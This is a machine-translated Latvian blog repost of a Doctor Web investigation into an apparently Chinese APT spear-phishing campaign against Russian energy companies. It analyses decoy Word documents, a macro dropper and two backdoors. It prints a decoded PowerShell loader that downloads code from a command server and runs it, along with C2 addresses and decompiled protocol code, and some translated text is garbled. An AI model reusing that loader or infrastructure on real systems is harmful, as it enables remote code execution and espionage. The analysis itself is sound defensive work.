ProHoster > Blogs > Administrācija > Mēs izmeklējam mērķtiecīgu spiegu uzbrukumu Krievijas degvielas un enerģijas kompleksam

Mēs izmeklējam mērķtiecīgu spiegu uzbrukumu Krievijas degvielas un enerģijas kompleksam

Mēs izmeklējam mērķtiecīgu spiegu uzbrukumu Krievijas degvielas un enerģijas kompleksam

MÅ«su pieredze datoru droŔības incidentu izmeklÄ“Å”anā liecina, ka e-pasts joprojām ir viens no visizplatÄ«tākajiem kanāliem, ko uzbrucēji izmanto, lai sākotnēji iekļūtu uzbruktajās tÄ«kla infrastruktÅ«rās. Viena neuzmanÄ«ga rÄ«cÄ«ba ar aizdomÄ«gu (vai ne tik aizdomÄ«gu) vēstuli kļūst par ieejas punktu tālākai inficÄ“Å”anai, tāpēc kibernoziedznieki aktÄ«vi izmanto sociālās inženierijas metodes, lai gan ar mainÄ«gām sekmēm.

Å ajā ierakstā mēs vēlamies runāt par mÅ«su neseno izmeklÄ“Å”anu saistÄ«bā ar surogātpasta kampaņu, kuras mērÄ·auditorija ir vairāki uzņēmumi Krievijas degvielas un enerÄ£ijas kompleksā. Visi uzbrukumi sekoja vienam un tam paÅ”am scenārijam, izmantojot viltus e-pastus, un Ŕķiet, ka neviens nav pielicis daudz pūļu Å”o e-pasta ziņojumu teksta saturam.

IzlūkoŔanas dienests

Viss sākās 2020. gada aprīļa beigās, kad Doctor Web vÄ«rusu analÄ«tiÄ·i atklāja surogātpasta kampaņu, kurā hakeri vairāku Krievijas degvielas un enerÄ£ijas kompleksa uzņēmumu darbiniekiem nosÅ«tÄ«ja atjauninātu tālruņu katalogu. Protams, tas nebija vienkārÅ”s satraukums, jo direktorijs nebija Ä«sts, un .docx dokumenti lejupielādēja divus attēlus no attāliem resursiem.

Viens no tiem tika lejupielādēts lietotāja datorā no ziņu[.]zannews[.]com servera. ZÄ«mÄ«gi, ka domēna vārds ir lÄ«dzÄ«gs Kazahstānas pretkorupcijas mediju centra domēnam zannews[.]kz. No otras puses, izmantotais domēns nekavējoties atgādināja citu 2015. gada kampaņu, kas pazÄ«stama ar nosaukumu TOPNEWS, kurā tika izmantotas ICEFOG aizmugures durvis un kuras nosaukumos bija Trojas kontroles domēni ar apakÅ”virkni ā€œnewsā€. Vēl viena interesanta iezÄ«me bija tāda, ka, sÅ«tot e-pastus dažādiem adresātiem, pieprasÄ«jumos lejupielādēt attēlu tika izmantoti vai nu dažādi pieprasÄ«juma parametri, vai unikāli attēlu nosaukumi.

Mēs uzskatām, ka tas tika darÄ«ts, lai savāktu informāciju, lai identificētu ā€œuzticamuā€ adresātu, kurÅ” pēc tam bÅ«tu garantēts, ka vēstuli atvērs Ä«stajā laikā. SMB protokols tika izmantots attēla lejupielādei no otrā servera, ko varēja izdarÄ«t, lai savāktu NetNTLM jaucējus no to darbinieku datoriem, kuri atvēra saņemto dokumentu.

Un Å”eit ir pati vēstule ar viltotu direktoriju:

Mēs izmeklējam mērķtiecīgu spiegu uzbrukumu Krievijas degvielas un enerģijas kompleksam

Å Ä« gada jÅ«nijā hakeri attēlu augÅ”upielādei sāka izmantot jaunu domēna nosaukumu sports[.]manhajnews[.]com. AnalÄ«ze parādÄ«ja, ka manhajnews[.]com apakÅ”domēni surogātpasta sÅ«tÄ«jumos ir izmantoti vismaz kopÅ” 2019. gada septembra. Viens no Ŕīs kampaņas mērÄ·iem bija liela Krievijas universitāte.

Tāpat lÄ«dz jÅ«nijam uzbrukuma organizatori nāca klajā ar jaunu tekstu savām vēstulēm: Å”oreiz dokumentā bija informācija par nozares attÄ«stÄ«bu. Vēstules teksts skaidri norādÄ«ja, ka tās autoram vai nu nav krievu valoda, vai arÄ« viņŔ apzināti rada Ŕādu iespaidu par sevi. Diemžēl nozares attÄ«stÄ«bas idejas, kā vienmēr, izrādÄ«jās tikai vāks - dokumentā atkal tika lejupielādēti divi attēli, savukārt serveris tika nomainÄ«ts uz download[.]inklingpaper[.]com.

Nākamais jauninājums sekoja jÅ«lijā. Mēģinot apiet pretvÄ«rusu programmu ļaunprātÄ«gu dokumentu atklāŔanu, uzbrucēji sāka izmantot Microsoft Word dokumentus, kas Å”ifrēti ar paroli. Tajā paŔā laikā uzbrucēji nolēma izmantot klasisku sociālās inženierijas paņēmienu - atlÄ«dzÄ«bas paziņojumu.

Mēs izmeklējam mērķtiecīgu spiegu uzbrukumu Krievijas degvielas un enerģijas kompleksam

Apelācijas teksts atkal bija rakstÄ«ts tādā paŔā stilā, kas adresātā radÄ«ja papildu aizdomas. ArÄ« attēla lejupielādes serveris nemainÄ«jās.

Ņemiet vērā, ka visos gadÄ«jumos vēstuļu sÅ«tÄ«Å”anai tika izmantotas elektroniskās pastkastÄ«tes, kas reÄ£istrētas mail[.]ru un yandex[.]ru domēnos.

Uzbrukums

LÄ«dz 2020. gada septembra sākumam bija pienācis laiks rÄ«koties. MÅ«su vÄ«rusu analÄ«tiÄ·i reÄ£istrēja jaunu uzbrukumu vilni, kurā uzbrucēji atkal sÅ«tÄ«ja vēstules, aizbildinoties ar tālruņu kataloga atjaunināŔanu. Tomēr Å”oreiz pielikumā bija ietverts ļaunprātÄ«gs makro.

Atverot pievienoto dokumentu, makro izveidoja divus failus:

  • VBS skripts %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, kas bija paredzēts pakeÅ”faila palaiÅ”anai;
  • Pats sērijveida fails %APPDATA%configstest.bat, kas tika aptumÅ”ots.

Mēs izmeklējam mērķtiecīgu spiegu uzbrukumu Krievijas degvielas un enerģijas kompleksam

Tās darba bÅ«tÄ«ba ir saistÄ«ta ar Powershell apvalka palaiÅ”anu ar noteiktiem parametriem. Apvalkam nodotie parametri tiek dekodēti komandās:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;

Kā izriet no sniegtajām komandām, domēns, no kura tiek lejupielādēta lietderÄ«gā slodze, atkal tiek slēpts kā ziņu vietne. VienkārÅ”s iekrāvējs, kura vienÄ«gais uzdevums ir saņemt čaulas kodu no komandu un vadÄ«bas servera un izpildÄ«t to. Mēs varējām identificēt divu veidu aizmugures durvis, kuras var instalēt upura datorā.

BackDoor.Siggen2.3238

Pirmais ir BackDoor.Siggen2.3238 ā€” mÅ«su speciālisti iepriekÅ” nebija saskāruÅ”ies, un arÄ« citi antivÄ«rusu ražotāji par Å”o programmu nebija pieminējuÅ”i.

Šī programma ir aizmugures durvis, kas rakstītas C++ valodā un darbojas 32 bitu Windows operētājsistēmās.

BackDoor.Siggen2.3238 spēj sazināties ar pārvaldÄ«bas serveri, izmantojot divus protokolus: HTTP un HTTPS. PārbaudÄ«tajā paraugā tiek izmantots HTTPS protokols. PieprasÄ«jumos serverim tiek izmantots Ŕāds lietotāja aÄ£ents:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)

Šajā gadījumā visi pieprasījumi tiek piegādāti ar Ŕādu parametru kopu:

%s;type=%s;length=%s;realdata=%send

kur katra rinda %s ir attiecīgi aizstāta ar:

  • inficētā datora ID,
  • nosÅ«tÄ«tā pieprasÄ«juma veids,
  • datu garums realdata laukā,
  • datus.

Informācijas vākÅ”anas posmā par inficēto sistēmu aizmugures durvis Ä£enerē Ŕādu rindu:

lan=%s;cmpname=%s;username=%s;version=%s;

kur lan ir inficētā datora IP adrese, cmpname ir datora nosaukums, lietotājvārds ir lietotājvārds, versija ir rinda 0.0.4.03.

Šī informācija ar sysinfo identifikatoru tiek nosūtīta ar POST pieprasījumu vadības serverim, kas atrodas vietnē https[:]//31.214[.]157.14/log.txt. Ja atbildot BackDoor.Siggen2.3238 saņem HEART signālu, savienojums tiek uzskatīts par veiksmīgu, un aizmugures durvis sāk galveno saziņas ciklu ar serveri.

Pilnīgāks darbības principu apraksts BackDoor.Siggen2.3238 ir mūsu vīrusu bibliotēka.

BackDoor.Whitebird.23

Otrā programma ir BackDoor.Whitebird backdoor modifikācija, kas mums jau zināma no incidenta ar valsts aģentūru Kazahstānā. Šī versija ir rakstīta C++ valodā un ir paredzēta darbam gan 32 bitu, gan 64 bitu Windows operētājsistēmās.

Tāpat kā lielākā daļa Ŕāda veida programmu, BackDoor.Whitebird.23 paredzēti, lai izveidotu Å”ifrētu savienojumu ar vadÄ«bas serveri un nesankcionētu inficēta datora kontroli. Instalēts bojātā sistēmā, izmantojot pilinātāju BackDoor.Siggen2.3244.

Mūsu pārbaudītais paraugs bija ļaunprātīga bibliotēka ar diviem eksportētiem failiem:

  • Google Play
  • Pārbaude.

Sava darba sākumā tas atÅ”ifrē aizmugures durvju korpusā pievienoto konfigurāciju, izmantojot algoritmu, kura pamatā ir XOR darbÄ«ba ar baitu 0x99. Konfigurācija izskatās Ŕādi:


struct st_cfg
{
  _DWORD dword0;
  wchar_t campaign[64];
  wchar_t cnc_addr[256];
  _DWORD cnc_port;
  wchar_t cnc_addr2[100];
  wchar_t cnc_addr3[100];
  _BYTE working_hours[1440];
  wchar_t proxy_domain[50];
  _DWORD proxy_port;
  _DWORD proxy_type;
  _DWORD use_proxy;
  _BYTE proxy_login[50];
  _BYTE proxy_password[50];
  _BYTE gapa8c[256];
};

Lai nodroÅ”inātu pastāvÄ«gu darbÄ«bu, aizmugurējās durvis maina laukā norādÄ«to vērtÄ«bu darba stundas konfigurācijas. Laukā ir 1440 baiti, kas ņem vērtÄ«bas 0 vai 1 un atspoguļo katru minÅ«ti no katras dienas stundas. Izveido atseviŔķu pavedienu katram tÄ«kla interfeisam, kas klausās interfeisu, un starpniekserverÄ« meklē autorizācijas paketes no inficētā datora. Kad Ŕāda pakete tiek noteikta, aizmugures durvis savam sarakstam pievieno informāciju par starpniekserveri. Turklāt, izmantojot WinAPI, tiek pārbaudÄ«ta starpniekservera klātbÅ«tne InternetQueryOptionW.

Programma pārbauda paÅ”reizējo minÅ«ti un stundu un salÄ«dzina to ar datiem laukā darba stundas konfigurācijas. Ja attiecÄ«gās dienas minÅ«tes vērtÄ«ba nav nulle, tiek izveidots savienojums ar vadÄ«bas serveri.

Izveidojot savienojumu ar serveri, tiek simulēta savienojuma izveide starp klientu un serveri, izmantojot TLS versijas 1.0 protokolu. Aizmugurējo durvju korpusā ir divi buferi.

Pirmajā buferī ir TLS 1.0 Client Hello pakete.

Mēs izmeklējam mērķtiecīgu spiegu uzbrukumu Krievijas degvielas un enerģijas kompleksam

Otrajā buferī ir TLS 1.0 klienta atslēgu apmaiņas paketes ar atslēgas garumu 0x100 baiti, Change Cipher Spec, Encrypted Handshake Message.

Mēs izmeklējam mērķtiecīgu spiegu uzbrukumu Krievijas degvielas un enerģijas kompleksam

NosÅ«tot Client Hello paketi, aizmugures durvis ieraksta 4 baitus paÅ”reizējā laika un 28 baitus pseidogadÄ«juma datu laukā Client Random, ko aprēķina Ŕādi:


v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
  *(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
  clientrnd[j] ^= 7 * (_BYTE)j;

Saņemtā pakete tiek nosūtīta uz vadības serveri. Atbilde (Server Hello pakete) pārbauda:

  • atbilstÄ«ba TLS protokola versijai 1.0;
  • klienta norādÄ«tā laika zÄ«moga (lauka Random Data paketes pirmie 4 baiti) atbilstÄ«ba servera norādÄ«tajam laikspiedogam;
  • pirmo 4 baitu sakritÄ«ba pēc laika zÄ«moga klienta un servera Random Data laukā.

NorādÄ«to sakritÄ«bu gadÄ«jumā aizmugures durvis sagatavo klienta atslēgu apmaiņas paketi. Lai to izdarÄ«tu, tā modificē publisko atslēgu klienta atslēgu apmaiņas pakotnē, kā arÄ« Å”ifrÄ“Å”anas IV un Å”ifrÄ“Å”anas datus pakotnē Encrypted Handshake Message.

Pēc tam aizmugures durvis saņem paketi no komandu un vadÄ«bas servera, pārbauda, ā€‹ā€‹vai TLS protokola versija ir 1.0, un pēc tam pieņem vēl 54 baitus (paketes pamattekstu). Tas pabeidz savienojuma iestatÄ«Å”anu.

Pilnīgāks darbības principu apraksts BackDoor.Whitebird.23 ir mūsu vīrusu bibliotēka.

Secinājums un secinājumi

Dokumentu, ļaunprātÄ«gas programmatÅ«ras un izmantotās infrastruktÅ«ras analÄ«ze ļauj ar pārliecÄ«bu teikt, ka uzbrukumu sagatavojusi viena no Ķīnas APT grupām. Ņemot vērā aizmugures durvju funkcionalitāti, kas tiek instalētas upuru datoros veiksmÄ«ga uzbrukuma gadÄ«jumā, inficÄ“Å”anās noved pie vismaz konfidenciālas informācijas zādzÄ«bas no uzbrukuÅ”o organizāciju datoriem.

Turklāt ļoti iespējams scenārijs ir specializētu Trojas zirgu instalÄ“Å”ana vietējos serveros ar Ä«paÅ”u funkciju. Tie varētu bÅ«t domēna kontrolleri, pasta serveri, interneta vārtejas utt. Kā redzams piemērā incidents Kazahstānā, Ŕādi serveri dažādu iemeslu dēļ Ä«paÅ”i interesē uzbrucējus.

Avots: www.habr.com

Pievieno komentāru